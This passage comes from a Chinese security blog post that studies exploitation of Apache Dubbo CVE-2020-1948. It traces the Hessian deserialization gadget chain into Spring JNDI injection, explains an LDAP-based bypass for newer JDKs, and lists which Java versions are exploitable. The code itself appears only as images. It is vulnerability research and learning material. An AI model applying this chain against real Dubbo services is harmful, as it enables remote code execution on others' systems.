<p><img src="/images/210302/Image%20%5B19%5D.png" alt=""></p>
<p>在putVal中调用了key的readObject，key就是我们所使用的gadget，DefaultBeanFactoryPointcutAdvisor，集成自AbstractBeanFactoryPointcutAdvisor，AbstractBeanFactoryPointcutAdvisor集成自AbstractPointcutAdvisor</p>
<p><img src="/images/210302/Image%20%5B20%5D.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B21%5D.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B22%5D.png" alt=""></p>
<p>AbstractPointcutAdvisor重写了equals方法</p>
<p><img src="/images/210302/Image%20%5B23%5D.png" alt=""></p>
<p>而AbstractBeanFactoryPointcutAdvisor又重写了getAdvice方法</p>
<p><img src="/images/210302/Image%20%5B24%5D.png" alt=""></p>
<p>之后从调用getBean开始就是spring的jndi流程了</p>
<p><img src="/images/210302/Image%20%5B25%5D.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B26%5D.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B27%5D.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B28%5D.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B29%5D.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B30%5D.png" alt=""></p>
<p>注意此处是一个匿名内部类实现doInContext</p>
<p><img src="/images/210302/Image%20%5B31%5D.png" alt=""></p>
<p>这里就触发了一个标准的Java JNDI注入了，InitialContext.lookup，参数可控<br>这个触发点和16年的Spring-framework-deserialization-RCE是一样的位置，根据当时相关文章的描述Spring官方将这个锅丢给了中间件反序列接口的防范上或者可以进行反序列的方法上，也就是之后Java版本对JNDI的修复。<br>刚刚也提到了JNDI注入Java在迭代时对远程codebase进行了限制不能加载任意远程codebase，更换1.8.0_251，JNDI注入失败</p>
<p><img src="/images/210302/Image%20%5B32%5D.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B33%5D.png" alt=""></p>
<p>所以这里我们使用 如何绕过高版本JDK的限制进行JNDI注入利用 <a href="https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html" target="_blank" rel="noopener">https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html</a> 一文中的思路使用LDAP触发其他gadget，这里我们借用雨了个雨师傅的LDAP server <a href="http://www.yulegeyu.com/2018/12/04/JNDI-Injection-Via-LDAP-Deserialize/" target="_blank" rel="noopener">http://www.yulegeyu.com/2018/12/04/JNDI-Injection-Via-LDAP-Deserialize/</a> 写入序列化数据，启动并监听，这里使用的是ysoserial  CommenCollections6 payload所以在dubbo演示中加上依赖，再使用之前的POC打一下</p>
<p><img src="/images/210302/Image%20%5B34%5D.png" alt=""></p>
<h3 id="利用学习"><a href="#利用学习" class="headerlink" title="利用学习"></a>利用学习</h3><p>看一下师傅是如何生成序列化POC的，dubbo-exp项目不多赘述，我们主要是学习师傅如何构造payload，跟入代码</p>
<p><img src="/images/210302/Image%20%5B35%5D.png" alt=""></p>
<p>包装输出流，写对象</p>
<p><img src="/images/210302/Image%20%5B36%5D.png" alt=""></p>
<p>获取序列化对象</p>
<p><img src="/images/210302/Image%20%5B37%5D.png" alt=""></p>
<p>新建一个BeanFactory装入JndiTemplate对象，也就是触发JNDI的对象</p>
<p><img src="/images/210302/Image%20%5B38%5D.png" alt=""></p>
<p>创建触发链路中的DefaultBeanFactoryPointcutAdvisor，并将其填入HashMap中</p>
<p><img src="/images/210302/Image%20%5B39%5D.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B40%5D.png" alt=""></p>
<p>之后将对象写入输出流中进行序列化，最后调用发送模块发送数据包完成一次攻击</p>
<p><img src="/images/210302/Image%20%5B41%5D.png" alt=""></p>
<p>工具中还有其他利用的方式这边就不多赘述了</p>
<h3 id="简单总结"><a href="#简单总结" class="headerlink" title="简单总结"></a>简单总结</h3><p>简单总结下对dubbo CVE-2020-1948的利用<br>受影响版本；<br>SpringAbstractBeanFactoryPointcutAdvisor（spring-aop）非常常见易满足；<br>低版本Java（8_121以下）可直接RMI，中间版本（8_121-8_191前）可使用JNDI注入任意命令，高版本（8_191）可在JNDI中注入序列化数据触发已有的gadget反序列化；<br>可见Java8_191前的版本非常易受攻击，利用基本不受限。</p>
<p>还有使用 org.apache.naming.factory.BeanFactory（Tomcat会依赖），作为第二层gadget绕过JNDI限制，之后会尝试学习，并看看这只方式的利用范围是不是更广。后面还会再学习RMI，JNDI，JRMP相关知识，并学习师傅们的反序列化利用思路。</p>
<hr>
<p>参考链接<br><a href="https://threedr3am.github.io/2020/02/14/dubbo%E6%BA%90%E7%A0%81%E6%B5%85%E6%9E%90-%E9%BB%98%E8%AE%A4dubbo%E5%8D%8F%E8%AE%AE%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%A9%E7%94%A8%E4%B9%8Bhessian2/" target="_blank" rel="noopener">https://threedr3am.github.io/2020/02/14/dubbo%E6%BA%90%E7%A0%81%E6%B5%85%E6%9E%90-%E9%BB%98%E8%AE%A4dubbo%E5%8D%8F%E8%AE%AE%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%A9%E7%94%A8%E4%B9%8Bhessian2/</a><br><a href="https://www.iswin.org/2016/01/24/Spring-framework-deserialization-RCE-%E5%88%86%E6%9E%90%E4%BB%A5%E5%8F%8A%E5%88%A9%E7%94%A8/" target="_blank" rel="noopener">https://www.iswin.org/2016/01/24/Spring-framework-deserialization-RCE-%E5%88%86%E6%9E%90%E4%BB%A5%E5%8F%8A%E5%88%A9%E7%94%A8/</a><br><a href="https://www.cnblogs.com/Welk1n/p/11066397.html" target="_blank" rel="noopener">https://www.cnblogs.com/Welk1n/p/11066397.html</a><br><a href="https://www.cnblogs.com/tr1ple/p/12335098.html#2PjbRAmK" target="_blank" rel="noopener">https://www.cnblogs.com/tr1ple/p/12335098.html#2PjbRAmK</a><br><a href="http://www.yulegeyu.com/2018/12/04/JNDI-Injection-Via-LDAP-Deserialize/" target="_blank" rel="noopener">http://www.yulegeyu.com/2018/12/04/JNDI-Injection-Via-LDAP-Deserialize/</a><br><a href="https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf" target="_blank" rel="noopener">https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf</a></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/02/23/dubbo%E8%BF%91%E6%9C%9F%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/" rel="prev" title="dubbo近期漏洞学习">
      <i class="fa fa-chevron-left"></i> dubbo近期漏洞学习
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/03/05/Dubbo%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0-%E5%86%8D%E7%BB%AD%E4%B8%80%E4%B8%8B/" rel="next" title="Dubbo漏洞学习-再续一下">
      Dubbo漏洞学习-再续一下 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#SpringAbstractBeanFactoryPointcutAdvisor触发尝试"><span class="nav-number">1.</span> <span class="nav-text">SpringAbstractBeanFactoryPointcutAdvisor触发尝试</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#旧版Spring实验"><span class="nav-number">1.1.</span> <span class="nav-text">旧版Spring实验</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#其他版本实验"><span class="nav-number">1.2.</span> <span class="nav-text">其他版本实验</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#尝试分析流程"><span class="nav-number">1.3.</span> <span class="nav-text">尝试分析流程</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用学习"><span class="nav-number">2.</span> <span class="nav-text">利用学习</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#简单总结"><span class="nav-number">3.</span> <span class="nav-text">简单总结</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">0xSky</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">13</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">0xSky</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
